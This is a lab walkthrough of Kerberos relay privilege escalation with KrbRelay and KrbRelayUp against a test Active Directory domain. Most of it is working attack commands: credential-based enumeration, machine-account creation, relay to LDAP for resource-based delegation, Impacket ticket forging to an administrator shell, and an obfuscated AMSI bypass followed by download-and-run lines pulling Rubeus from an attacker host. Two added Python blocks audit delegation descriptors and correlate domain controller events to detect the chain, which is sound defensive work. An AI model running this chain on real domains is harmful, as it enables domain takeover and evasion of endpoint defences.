KrbRelay Up - Linux

  • Another very useful technique to escalate privileges is Kerberos relay, as implemented in KrbRelayUp.

  • As KrbRelayUp is detected by Defender, we will use the step-by-step approach from this writeup by @an0n_r0, using @cube0x0's KrbRelay.

  • At the time of writing, KrbRelay is not detected by Defender.

  • The condition for this privesc is that LDAP signing is NOT enforced on the DC; we can check that with the cme ldap-signing module:

crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing

Add computer and RBCD

  • To exploit KrbRelay by adding a computer, you must be allowed to add new computer accounts (the ms-DS-MachineAccountQuota, MAQ); we can check that with the cme MAQ module:

crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ

Add the computer (one of the two commands below, depending on the user you have):

addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'

Get the SID of that computer:

From Windows

$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136

From Linux

lookupsid.py  -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

Check ports

xrdp

xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443

Launch KrbRelay

CLSID: CIeAxiInstallerService Class

https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443

Now we finish with the RBCD exploitation.

From Linux with Impacket:

getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator

With Rubeus from Windows

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers /ptt"

  • And just like the writeup by @an0n_r0, we launch SCMUACBypass.exe by Tyranid and get a SYSTEM shell.
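From the defender's side, the two artefacts this chain leaves in the directory are the new computer object (whose objectSid is decoded above with PowerShell) and a security descriptor written into msDS-AllowedToActOnBehalfOfOtherIdentity on the target host. The Python below is an added example, not code from this writeup nor from KrbRelay, Impacket or Rubeus: it decodes a binary SID exactly as the PowerShell snippet does, then parses the self-relative security descriptor stored in that attribute and lists which SIDs have been granted the delegation right, which is the check an auditor runs against every host. The descriptor bytes are constructed in the block itself (no owner, group or SACL, and the access mask is just a sample value); the krbrelay$ SID is the one shown in the writeup.

```python
import struct

# Binary SID (MS-DTYP 2.4.2.2): revision, sub-authority count, 48-bit
# big-endian identifier authority, then little-endian 32-bit sub-authorities.
# This is the layout carried by the objectSid attribute.

def encode_sid(sid: str) -> bytes:
    """Serialise an 'S-1-<authority>-<sub>...' string into binary form."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"unsupported SID string: {sid!r}")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    out = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def decode_sid(blob: bytes) -> str:
    """Decode a binary SID to its string form, as
    System.Security.Principal.SecurityIdentifier(bytes, 0).Value does."""
    if len(blob) < 8:
        raise ValueError("SID blob too short")
    revision, count = struct.unpack_from("<BB", blob, 0)
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID blob truncated")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "-".join(["S", "1", str(authority), *map(str, subs)])


# Self-relative security descriptor (MS-DTYP 2.4.6) as stored in
# msDS-AllowedToActOnBehalfOfOtherIdentity: 20-byte header with offsets,
# followed (for this audit) by the DACL.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACE_TYPE_NAMES = {0x00: "ACCESS_ALLOWED", 0x01: "ACCESS_DENIED"}


def parse_dacl(sd: bytes) -> list:
    """Return (ace_type, sid, access_mask) for every ACE in the DACL. Only the
    plain allowed/denied ACE types are decoded; other types are reported by
    number so nothing is silently dropped."""
    if len(sd) < 20:
        raise ValueError("security descriptor too short")
    revision, _sbz1, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("expected a revision-1 self-relative descriptor")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        # A descriptor without a DACL grants access to everyone: surface it
        # instead of reporting "nobody".
        return [("NO_DACL", "*", None)]
    _acl_rev, _sbz, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    if off_dacl + acl_size > len(sd):
        raise ValueError("ACL extends past end of descriptor")
    entries, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_size < 4 or pos + ace_size > off_dacl + acl_size:
            raise ValueError("malformed ACE")
        if ace_type in ACE_TYPE_NAMES:
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            entries.append((ACE_TYPE_NAMES[ace_type], decode_sid(sd[pos + 8:pos + ace_size]), mask))
        else:
            entries.append((f"ACE_TYPE_{ace_type:#04x}", None, None))
        pos += ace_size
    return entries


def allowed_delegators(sd: bytes) -> list:
    """SIDs the descriptor allows to act on behalf of other identities, i.e.
    the accounts an auditor must be able to explain for this host."""
    return [sid for kind, sid, _ in parse_dacl(sd) if kind in ("ACCESS_ALLOWED", "NO_DACL")]


def build_rbcd_descriptor(sids: list, mask: int = 0xF01FF) -> bytes:
    """Constructed test data: a minimal descriptor (no owner/group/SACL, one
    allow ACE per SID) so the parser can be exercised offline. The mask is
    only a sample value."""
    aces = b"".join(struct.pack("<BBHI", 0x00, 0x00, 8 + len(encode_sid(s)), mask) + encode_sid(s) for s in sids)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20) + acl


# The krbrelay$ SID from the writeup, used as constructed sample input.
KRBRELAY_SID = "S-1-5-21-3634065772-4036021599-3644360361-1136"

if __name__ == "__main__":
    print(decode_sid(encode_sid(KRBRELAY_SID)))
    for kind, sid, mask in parse_dacl(build_rbcd_descriptor([KRBRELAY_SID])):
        print(kind, sid, hex(mask) if mask is not None else "")
```

In practice you would feed `allowed_delegators` the raw attribute bytes read over LDAP for each computer object and compare the result against the list of delegations you actually intended; any fresh machine account in that list, like krbrelay$ here, is the thing to explain.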

Without AV, or if you modify/obfuscate KrbRelayUp, you can do all of the above with the following commands:

.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
.\KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123

  • KrbRelay can also be used to relay to ADCS, or to add msDS-KeyCredentialLink and exploit it with ShadowCredentials. All you need to know is on this page; this is left as an exercise to the reader.
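Whichever tool runs the chain (KrbRelay step by step or KrbRelayUp in one go), the domain controller's Security log sees the same three things: a computer account created (4741), a delegation attribute written on a host object (5136, which needs object-change auditing enabled; the same event covers msDS-KeyCredentialLink for the ShadowCredentials variant), and a delegated service ticket request (4769 with the TransmittedServices field populated, rendered as "Transited Services" in the event text). The detection below is an added example, not part of this writeup or of either tool: it correlates those events within a time window and raises the severity when the delegating account is brand new or when a host writes the attribute on its own object, which is how a relayed machine-account authentication shows up. The log lines are constructed to match the lab's names; the timestamps, OU, IP addresses and the benign first 4769 are made up.

```python
import json
import re
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
KCL_ATTR = "msDS-KeyCredentialLink"
WATCHED_ATTRS = {RBCD_ATTR, KCL_ATTR}
DOMAIN_SID_RE = re.compile(r"S-1-5-21(?:-\d+)+")

# Constructed sample: a JSON-lines export of the DC's Security log, one event
# per line with the event data fields flattened. Names follow the lab in the
# writeup (krbrelay$, YONKERS, elena.lopez); everything else is made up.
SAMPLE_LOG = """
{"EventID": 4769, "TimeCreated": "2024-01-10T10:00:01", "TargetUserName": "elena.lopez@NORTH.NEWYORK.LOCAL", "ServiceName": "BRONX$", "TransmittedServices": "-", "IpAddress": "192.168.56.11"}
{"EventID": 4741, "TimeCreated": "2024-01-10T10:01:12", "SubjectUserName": "elena.lopez", "TargetUserName": "krbrelay$", "TargetSid": "S-1-5-21-3634065772-4036021599-3644360361-1136"}
{"EventID": 5136, "TimeCreated": "2024-01-10T10:03:40", "SubjectUserName": "YONKERS$", "ObjectDN": "CN=YONKERS,OU=Servers,DC=north,DC=newyork,DC=local", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674", "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3634065772-4036021599-3644360361-1136)"}
{"EventID": 4769, "TimeCreated": "2024-01-10T10:05:02", "TargetUserName": "administrator@NORTH.NEWYORK.LOCAL", "ServiceName": "YONKERS$", "TransmittedServices": "krbrelay$@NORTH.NEWYORK.LOCAL", "IpAddress": "192.168.56.31"}
"""


def _when(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["TimeCreated"])


def _cn(dn: str) -> str:
    """First RDN value of a DN: 'CN=YONKERS,OU=...' -> 'YONKERS'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def detect_rbcd_chain(lines, window: timedelta = timedelta(hours=1)) -> list:
    """Correlate computer creation (4741), writes to delegation attributes
    (5136) and delegated ticket requests (4769 with TransmittedServices).
    Returns findings in time order, each with a stage and a severity."""
    events = sorted((json.loads(l) for l in lines if l.strip()), key=_when)
    new_computers = {}  # SID -> (sAMAccountName, creation time)
    findings = []
    for ev in events:
        eid, t = ev["EventID"], _when(ev)
        if eid == 4741:
            new_computers[ev["TargetSid"]] = (ev["TargetUserName"], t)
            findings.append({"stage": "computer_created", "account": ev["TargetUserName"],
                             "by": ev["SubjectUserName"], "severity": "low"})
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") in WATCHED_ATTRS:
            # 5136 renders a security-descriptor attribute as SDDL, so the
            # granted SIDs can be pulled straight out of the value.
            sids = DOMAIN_SID_RE.findall(ev.get("AttributeValue", ""))
            fresh = [new_computers[s][0] for s in sids
                     if s in new_computers and t - new_computers[s][1] <= window]
            # A host writing the attribute on its own object is the signature
            # of a relayed machine-account authentication, not an admin change.
            self_write = ev["SubjectUserName"].rstrip("$").lower() == _cn(ev["ObjectDN"]).lower()
            findings.append({"stage": "delegation_attribute_written",
                             "attribute": ev["AttributeLDAPDisplayName"], "object": _cn(ev["ObjectDN"]),
                             "by": ev["SubjectUserName"], "new_accounts": fresh, "self_write": self_write,
                             "severity": "high" if fresh or self_write else "medium"})
        elif eid == 4769 and ev.get("TransmittedServices", "-") not in ("-", ""):
            # A populated TransmittedServices field means an S4U2Proxy request:
            # the listed service obtained a ticket on someone else's behalf.
            delegator = ev["TransmittedServices"].split("@", 1)[0]
            recent = any(name.lower() == delegator.lower() and t - created <= window
                         for name, created in new_computers.values())
            findings.append({"stage": "s4u2proxy_ticket", "impersonated": ev["TargetUserName"],
                             "service": ev["ServiceName"], "delegator": delegator,
                             "severity": "high" if recent else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_rbcd_chain(SAMPLE_LOG.splitlines()):
        details = {k: v for k, v in f.items() if k not in ("stage", "severity")}
        print(f["severity"].upper(), f["stage"], details)
```

On the sample this yields a low finding for the account creation, then two high findings: the self-write of the RBCD attribute on YONKERS referencing the account created two minutes earlier, and the delegated ticket for administrator obtained through krbrelay$. Legitimate constrained delegation also produces 4769 events with TransmittedServices set, which is why that stage alone is only medium unless the delegator is a freshly created account.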
